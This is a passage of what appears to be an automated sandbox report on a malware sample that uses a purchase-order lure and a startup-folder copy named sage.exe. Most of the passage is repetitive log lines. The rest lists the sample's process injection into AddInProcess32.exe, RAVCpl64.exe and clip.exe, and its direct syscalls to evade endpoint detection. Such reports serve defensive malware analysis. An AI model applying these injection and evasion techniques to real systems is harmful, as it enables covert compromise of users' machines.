                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C0835 mov eax, dword ptr fs:[00000030h]18_2_015C0835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C0835 mov eax, dword ptr fs:[00000030h]18_2_015C0835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C0835 mov eax, dword ptr fs:[00000030h]18_2_015C0835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C0835 mov eax, dword ptr fs:[00000030h]18_2_015C0835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C0835 mov eax, dword ptr fs:[00000030h]18_2_015C0835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C0835 mov eax, dword ptr fs:[00000030h]18_2_015C0835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C0835 mov eax, dword ptr fs:[00000030h]18_2_015C0835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C0835 mov eax, dword ptr fs:[00000030h]18_2_015C0835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C0835 mov eax, dword ptr fs:[00000030h]18_2_015C0835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015228C0 mov eax, dword ptr fs:[00000030h]18_2_015228C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015228C0 mov eax, dword ptr fs:[00000030h]18_2_015228C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015228C0 mov eax, dword ptr fs:[00000030h]18_2_015228C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015228C0 mov eax, dword ptr fs:[00000030h]18_2_015228C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015228C0 mov eax, dword ptr fs:[00000030h]18_2_015228C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015228C0 mov eax, dword ptr fs:[00000030h]18_2_015228C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015228C0 mov eax, dword ptr fs:[00000030h]18_2_015228C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015228C0 mov eax, dword ptr fs:[00000030h]18_2_015228C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015228C0 mov eax, dword ptr fs:[00000030h]18_2_015228C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015228C0 mov eax, dword ptr fs:[00000030h]18_2_015228C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015228C0 mov eax, dword ptr fs:[00000030h]18_2_015228C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015228C0 mov eax, dword ptr fs:[00000030h]18_2_015228C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015228C0 mov eax, dword ptr fs:[00000030h]18_2_015228C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015088C8 mov eax, dword ptr fs:[00000030h]18_2_015088C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015088C8 mov eax, dword ptr fs:[00000030h]18_2_015088C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015108CD mov eax, dword ptr fs:[00000030h]18_2_015108CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015108CD mov eax, dword ptr fs:[00000030h]18_2_015108CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015A88FB mov eax, dword ptr fs:[00000030h]18_2_015A88FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151A8F0 mov eax, dword ptr fs:[00000030h]18_2_0151A8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151A8F0 mov eax, dword ptr fs:[00000030h]18_2_0151A8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151A8F0 mov eax, dword ptr fs:[00000030h]18_2_0151A8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151A8F0 mov eax, dword ptr fs:[00000030h]18_2_0151A8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151A8F0 mov eax, dword ptr fs:[00000030h]18_2_0151A8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151A8F0 mov eax, dword ptr fs:[00000030h]18_2_0151A8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015448F0 mov eax, dword ptr fs:[00000030h]18_2_015448F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C8890 mov eax, dword ptr fs:[00000030h]18_2_015C8890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C8890 mov eax, dword ptr fs:[00000030h]18_2_015C8890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01536882 mov eax, dword ptr fs:[00000030h]18_2_01536882
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01536882 mov eax, dword ptr fs:[00000030h]18_2_01536882
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01536882 mov eax, dword ptr fs:[00000030h]18_2_01536882
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159488F mov eax, dword ptr fs:[00000030h]18_2_0159488F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0155088E mov eax, dword ptr fs:[00000030h]18_2_0155088E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0155088E mov edx, dword ptr fs:[00000030h]18_2_0155088E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0155088E mov eax, dword ptr fs:[00000030h]18_2_0155088E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151AB70 mov eax, dword ptr fs:[00000030h]18_2_0151AB70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151AB70 mov eax, dword ptr fs:[00000030h]18_2_0151AB70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151AB70 mov eax, dword ptr fs:[00000030h]18_2_0151AB70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151AB70 mov eax, dword ptr fs:[00000030h]18_2_0151AB70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151AB70 mov eax, dword ptr fs:[00000030h]18_2_0151AB70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151AB70 mov eax, dword ptr fs:[00000030h]18_2_0151AB70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01516B70 mov eax, dword ptr fs:[00000030h]18_2_01516B70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01516B70 mov eax, dword ptr fs:[00000030h]18_2_01516B70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01516B70 mov eax, dword ptr fs:[00000030h]18_2_01516B70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C6B77 mov eax, dword ptr fs:[00000030h]18_2_015C6B77
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01544B79 mov eax, dword ptr fs:[00000030h]18_2_01544B79
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015E4B67 mov eax, dword ptr fs:[00000030h]18_2_015E4B67
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01518B10 mov eax, dword ptr fs:[00000030h]18_2_01518B10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01518B10 mov eax, dword ptr fs:[00000030h]18_2_01518B10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01518B10 mov eax, dword ptr fs:[00000030h]18_2_01518B10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01520B10 mov eax, dword ptr fs:[00000030h]18_2_01520B10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01520B10 mov eax, dword ptr fs:[00000030h]18_2_01520B10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01520B10 mov eax, dword ptr fs:[00000030h]18_2_01520B10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01520B10 mov eax, dword ptr fs:[00000030h]18_2_01520B10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150CB1E mov eax, dword ptr fs:[00000030h]18_2_0150CB1E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153EB1C mov eax, dword ptr fs:[00000030h]18_2_0153EB1C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154CB20 mov eax, dword ptr fs:[00000030h]18_2_0154CB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159CB20 mov eax, dword ptr fs:[00000030h]18_2_0159CB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159CB20 mov eax, dword ptr fs:[00000030h]18_2_0159CB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159CB20 mov eax, dword ptr fs:[00000030h]18_2_0159CB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01538BD1 mov eax, dword ptr fs:[00000030h]18_2_01538BD1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01538BD1 mov eax, dword ptr fs:[00000030h]18_2_01538BD1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B6BDE mov ebx, dword ptr fs:[00000030h]18_2_015B6BDE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B6BDE mov eax, dword ptr fs:[00000030h]18_2_015B6BDE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150EBC0 mov eax, dword ptr fs:[00000030h]18_2_0150EBC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01594BC0 mov eax, dword ptr fs:[00000030h]18_2_01594BC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01594BC0 mov eax, dword ptr fs:[00000030h]18_2_01594BC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01594BC0 mov eax, dword ptr fs:[00000030h]18_2_01594BC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01594BC0 mov eax, dword ptr fs:[00000030h]18_2_01594BC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015E4BE0 mov eax, dword ptr fs:[00000030h]18_2_015E4BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D8BBE mov eax, dword ptr fs:[00000030h]18_2_015D8BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D8BBE mov eax, dword ptr fs:[00000030h]18_2_015D8BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D8BBE mov eax, dword ptr fs:[00000030h]18_2_015D8BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D8BBE mov eax, dword ptr fs:[00000030h]18_2_015D8BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01594A57 mov eax, dword ptr fs:[00000030h]18_2_01594A57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01594A57 mov eax, dword ptr fs:[00000030h]18_2_01594A57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153EA40 mov eax, dword ptr fs:[00000030h]18_2_0153EA40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153EA40 mov eax, dword ptr fs:[00000030h]18_2_0153EA40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015AAA40 mov eax, dword ptr fs:[00000030h]18_2_015AAA40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015AAA40 mov eax, dword ptr fs:[00000030h]18_2_015AAA40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154AA0E mov eax, dword ptr fs:[00000030h]18_2_0154AA0E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154AA0E mov eax, dword ptr fs:[00000030h]18_2_0154AA0E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B4AC2 mov eax, dword ptr fs:[00000030h]18_2_015B4AC2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01520ACE mov eax, dword ptr fs:[00000030h]18_2_01520ACE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01520ACE mov eax, dword ptr fs:[00000030h]18_2_01520ACE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01590AFF mov eax, dword ptr fs:[00000030h]18_2_01590AFF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01590AFF mov eax, dword ptr fs:[00000030h]18_2_01590AFF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01590AFF mov eax, dword ptr fs:[00000030h]18_2_01590AFF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015E4AE8 mov eax, dword ptr fs:[00000030h]18_2_015E4AE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01530AEB mov eax, dword ptr fs:[00000030h]18_2_01530AEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01530AEB mov eax, dword ptr fs:[00000030h]18_2_01530AEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01530AEB mov eax, dword ptr fs:[00000030h]18_2_01530AEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B0AE0 mov eax, dword ptr fs:[00000030h]18_2_015B0AE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B2AE0 mov eax, dword ptr fs:[00000030h]18_2_015B2AE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B2AE0 mov eax, dword ptr fs:[00000030h]18_2_015B2AE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01510AED mov eax, dword ptr fs:[00000030h]18_2_01510AED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01510AED mov eax, dword ptr fs:[00000030h]18_2_01510AED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01510AED mov eax, dword ptr fs:[00000030h]18_2_01510AED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C6A80 mov eax, dword ptr fs:[00000030h]18_2_015C6A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015E4D4B mov eax, dword ptr fs:[00000030h]18_2_015E4D4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158CD40 mov eax, dword ptr fs:[00000030h]18_2_0158CD40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158CD40 mov eax, dword ptr fs:[00000030h]18_2_0158CD40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B6D79 mov esi, dword ptr fs:[00000030h]18_2_015B6D79
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153CD10 mov eax, dword ptr fs:[00000030h]18_2_0153CD10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153CD10 mov ecx, dword ptr fs:[00000030h]18_2_0153CD10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015A8D0A mov eax, dword ptr fs:[00000030h]18_2_015A8D0A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151AD00 mov eax, dword ptr fs:[00000030h]18_2_0151AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151AD00 mov eax, dword ptr fs:[00000030h]18_2_0151AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151AD00 mov eax, dword ptr fs:[00000030h]18_2_0151AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151AD00 mov eax, dword ptr fs:[00000030h]18_2_0151AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151AD00 mov eax, dword ptr fs:[00000030h]18_2_0151AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151AD00 mov eax, dword ptr fs:[00000030h]18_2_0151AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01530D01 mov eax, dword ptr fs:[00000030h]18_2_01530D01
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159CD00 mov eax, dword ptr fs:[00000030h]18_2_0159CD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159CD00 mov eax, dword ptr fs:[00000030h]18_2_0159CD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153AD20 mov eax, dword ptr fs:[00000030h]18_2_0153AD20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153AD20 mov eax, dword ptr fs:[00000030h]18_2_0153AD20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153AD20 mov eax, dword ptr fs:[00000030h]18_2_0153AD20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153AD20 mov ecx, dword ptr fs:[00000030h]18_2_0153AD20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153AD20 mov eax, dword ptr fs:[00000030h]18_2_0153AD20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153AD20 mov eax, dword ptr fs:[00000030h]18_2_0153AD20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153AD20 mov eax, dword ptr fs:[00000030h]18_2_0153AD20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153AD20 mov eax, dword ptr fs:[00000030h]18_2_0153AD20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153AD20 mov eax, dword ptr fs:[00000030h]18_2_0153AD20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153AD20 mov eax, dword ptr fs:[00000030h]18_2_0153AD20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C0D24 mov eax, dword ptr fs:[00000030h]18_2_015C0D24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C0D24 mov eax, dword ptr fs:[00000030h]18_2_015C0D24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C0D24 mov eax, dword ptr fs:[00000030h]18_2_015C0D24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C0D24 mov eax, dword ptr fs:[00000030h]18_2_015C0D24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015CADD6 mov eax, dword ptr fs:[00000030h]18_2_015CADD6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015CADD6 mov eax, dword ptr fs:[00000030h]18_2_015CADD6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01508DCD mov eax, dword ptr fs:[00000030h]18_2_01508DCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150EDFA mov eax, dword ptr fs:[00000030h]18_2_0150EDFA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DCDEB mov eax, dword ptr fs:[00000030h]18_2_015DCDEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DCDEB mov eax, dword ptr fs:[00000030h]18_2_015DCDEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01516D91 mov eax, dword ptr fs:[00000030h]18_2_01516D91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150CD8A mov eax, dword ptr fs:[00000030h]18_2_0150CD8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150CD8A mov eax, dword ptr fs:[00000030h]18_2_0150CD8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01542DBC mov eax, dword ptr fs:[00000030h]18_2_01542DBC
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\PO# 81136575.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Allocates memory in foreign processes
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and writeJump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtMapViewOfSection: Direct from: 0x44B1F57
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x44B9AE9
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FFAC53E2651
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeNtResumeThread: Indirect: 0x5663B89Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x44B2095
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeNtQueueApcThread: Indirect: 0x565F3C5Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x44B1E51
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x44B2023
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtMapViewOfSection: Direct from: 0x44B1F9B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeNtClose: Indirect: 0x565F453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeNtSetContextThread: Indirect: 0x5663549Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeNtSuspendThread: Indirect: 0x5663869Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory written: unknown base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe protection: execute and read and write
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe protection: read write
                Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe protection: execute and read and write
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread register set: target process: 7520Jump to behavior
                Source: C:\Windows\SysWOW64\clip.exeThread register set: target process: unknown
                Queues an APC in another process (thread injection)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
